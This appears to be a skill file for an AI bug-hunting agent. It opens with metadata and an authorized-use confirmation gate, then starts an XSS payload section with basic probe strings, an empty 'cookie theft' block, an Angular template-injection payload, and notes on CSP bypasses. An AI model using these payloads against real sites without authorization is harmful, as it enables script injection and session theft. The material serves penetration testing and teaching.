--- name: security-arsenal description: Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. category: security risk: offensive source: https://github.com/elementalsouls/Claude-BugHunter source_repo: elementalsouls/Claude-BugHunter source_type: community date_added: '2026-09-20' license: MIT license_source: https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE compatibility: Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled. sources: community, public_research --- > **⚠️ AUTHORIZED USE ONLY** > This skill is for educational purposes or authorized security assessments only. > You must have explicit, written permission from the system owner before using this tool. > Misuse of this tool is illegal and strictly prohibited. > **Mandatory confirmation gate** > Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target: > 1. Ask the user to state the exact target URL, IP, account, or resource. > 2. Ask the user to confirm written authorization and the permitted scope. > 3. Show the exact command(s) and explain their expected effect. > 4. Wait for explicit confirmation in the current conversation. > > Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab. # SECURITY ARSENAL Payloads, bypass tables, wordlists, and submission rules. --- ## XSS PAYLOADS ### Basic Probes ```javascript "> '> javascript:alert(document.domain) ``` ### Cookie Theft (proof of impact) ```javascript ``` ### CSP Bypass Techniques ```javascript // If unsafe-inline blocked — use fetch/XHR // If script-src nonce present — find nonce reflection // Angular template injection (bypasses many CSPs) {{constructor.constructor('alert(1)')()}} // React dangerouslySetInnerHTML reflection // Vue v-html binding // mXSS (mutation-based XSS)